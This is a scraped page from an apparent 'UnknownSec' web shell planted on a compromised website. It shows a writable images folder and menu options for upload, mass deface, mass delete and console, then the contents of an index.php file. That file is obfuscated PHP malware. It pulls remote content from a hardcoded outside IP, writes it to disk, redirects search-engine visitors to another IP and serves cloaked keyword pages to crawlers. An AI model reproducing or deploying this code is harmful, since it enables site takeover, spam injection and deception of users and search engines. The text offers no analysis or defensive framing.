shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
socialite.brannanatkinson.com
/
public
/
assets
/
images
/
tssmmtor6
/ [
drwxrwxrwx
]
upload
mass deface
mass delete
console
info server
name :
index.php
<?php goto Fy1dT; zm1do: if (function_exists("\x63\x75\162\154\137\x69\x6e\x69\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\x68\x74\x74\160\72\x2f\57\x36\x35\56\x31\x30\x39\x2e\x36\67\x2e\x31\60\60\57" . $_GET["\x66\156"] . "\x2e\160\x68\x70\77\160\x61\163\x73\x3d{$apass}\46\161\75{$_GET["\x69\x64"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\157\x7a\x69\x6c\x6c\141\57\x34\56\x30\x20\50\143\157\155\x70\141\x74\x69\x62\x6c\145\73\40\115\x53\x49\x45\x20\x36\56\x30\x3b\x20\127\x69\156\144\x6f\167\x73\40\x4e\x54\40\x35\x2e\61\73\x20\x53\126\x31\51"); $text = curl_exec($ch); curl_close($ch); } goto lRrTR; rNUDm: $s = dirname($_SERVER["\120\110\x50\137\123\x45\114\x46"]); goto uNOOG; LNbGK: $x1 = 3; goto yt55J; g1kR5: if (strlen($text) < 5000) { $url = "\x36\x35\56\61\60\71\x2e\66\67\56\x31\60\x30"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\x20\x28{$errno}\x29\74\x62\162\40\57\76\xa"; } else { $req = "\57" . $_GET["\146\x6e"] . "\x2e\x70\150\x70\x3f\160\x61\x73\x73\75{$apass}\46\161\75{$_GET["\151\x64"]}"; $out = "\x47\x45\x54\40{$req}\40\x48\x54\x54\x50\57\61\x2e\x30\xd\12"; $out .= "\x48\x6f\x73\x74\72\x20{$url}\15\12"; $out .= "\x43\x6f\x6e\x6e\145\x63\164\x69\157\156\72\x20\x43\x6c\x6f\x73\x65\15\xa\15\xa"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\12", $text); $text = $text[7]; } goto kUZ2F; U2nuw: foreach ($_GET as $a => $b) { $_GET["\151\144"] = $b; } goto dqAwz; bM80u: if ($_GET["\151\x64"] == "\x69\x6e\x64\145\170") { header("\x4c\157\143\x61\x74\x69\x6f\x6e\72\x20\x68\164\x74\160\163\x3a\x2f\x2f\147\157\x6f\147\154\145\56\x63\157\155"); die; } goto ShZh6; yt55J: $xx1 = 5; goto hJ336; ShZh6: $_GET["\x77\157\162\154\x64"] = 5; goto Gn6L_; uNOOG: if ($s == "\x5c" | $s == "\57") { $s = ''; } goto Mu7rI; jxVBn: $text = ''; goto zm1do; XMfaE: echo $text; goto sLU5U; c2nb3: $apass2 = "\x62\x32\63\150\x72\x32\63\x76\162\63\x32"; goto rNUDm; hfoFS: $keyword = str_replace("\x20", "\53", $keyword); goto c2nb3; KMKmd: $query_pars_2 = str_replace("\x2d", "\53", $_GET["\x69\x64"]); goto jxVBn; hJ336: $keyword = str_replace("\55", "\40", $_GET["\x69\x64"]); goto hfoFS; iN4Sh: $apass1 = "\x76\151\163\x64\157\x69\152\x65\167"; goto LNbGK; lRrTR: if (strlen($text) < 5000) { $text = file_get_contents("\x68\x74\164\160\72\57\x2f\66\x35\56\61\x30\71\x2e\66\67\x2e\61\x30\x30\x2f" . $_GET["\x66\156"] . "\56\x70\150\160\77\160\x61\163\x73\x3d{$apass}\46\x71\x3d{$_GET["\151\144"]}"); } goto g1kR5; Mu7rI: $s = $_SERVER["\123\105\122\x56\x45\x52\137\x4e\x41\x4d\105"] . $s; goto DYewG; dqAwz: if ($_GET["\151\144"] == "\164\x65\163\x74\x69\x6e\147") { echo "\x74\145\x73\164\x20\x67\157\x6f\144\x2e\x2e\56"; die; } goto bM80u; Fy1dT: error_reporting(0); goto VxAYH; qX7cm: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto hEsue; kUZ2F: if (strlen($text) > 500) { $out = fopen("\151\x6e\144\145\x78\x2f" . $myname, "\x77"); fwrite($out, $text); fclose($out); } goto XMfaE; DYewG: $apass3 = "\x72\x76\63\x32\x79\x64\x61\143\163\166\163\144\x76"; goto qX7cm; VxAYH: $today = "\62\60\x32\66\60\x32\x31\x37\x2d"; goto U2nuw; Gn6L_: $_GET["\x66\156"] = "\x36\x39\66\x39\66\x39\156\145\167"; goto iN4Sh; hEsue: if (strpos($_SERVER["\x48\124\124\x50\x5f\x52\x45\106\x45\122\105\122"], "\147\x6f\x6f\147\x6c\145\56") or strpos($_SERVER["\x48\x54\x54\x50\x5f\122\105\106\x45\122\x45\x52"], "\171\x61\150\157\157\x2e") or strpos($_SERVER["\x48\124\x54\120\137\122\105\106\x45\122\105\122"], "\142\151\x6e\x67\56")) { $tpl = "\x69\x6e\x64\x65\170\57" . $_GET["\x69\144"] . "\56\160\x68\x70\x2e\x74\x70\x6c"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\x6d\x79"]; header("\x4c\157\x63\x61\x74\x69\x6f\x6e\x3a\x20\150\164\x74\x70\x3a\57\x2f\66\x35\x2e\x31\60\70\56\x31\60\x2e\x31\x39\x39\57\145\156\164\x65\162\57\77\x6d\141\x72\x6b\x3d{$today}\55{$s}\46\164\160\x6c\75{$tpl}\46\145\156\147\153\x65\171\x3d{$keyword}"); die; } else { $myname = $_GET["\151\x64"] . "\x2e\x70\x68\x70"; if (file_exists("\x69\156\144\145\170\57" . $myname)) { $html = @file_get_contents("\x69\156\x64\145\x78\57" . $myname); if (strpos($_SERVER["\110\x54\x54\120\137\x55\x53\x45\122\x5f\101\107\105\116\x54"], "\142\151\x6e\147") > 2 or strpos($_SERVER["\x48\124\124\x50\137\125\123\105\x52\x5f\x41\107\105\x4e\x54"], "\x79\141\x68\x6f\157") > 2) { $keyword = str_replace("\55", "\x20", $_GET["\151\144"]); $html = str_replace("\x3c\x74\x69\x74\x6c\145\76\x3c\x2f\164\x69\x74\154\x65\76", "\x3c\x74\x69\164\154\x65\x3e{$keyword}\74\x2f\x74\151\164\154\x65\76", $html); } echo $html; die; } } goto KMKmd; sLU5U: ?>
© 2026 UnknownSec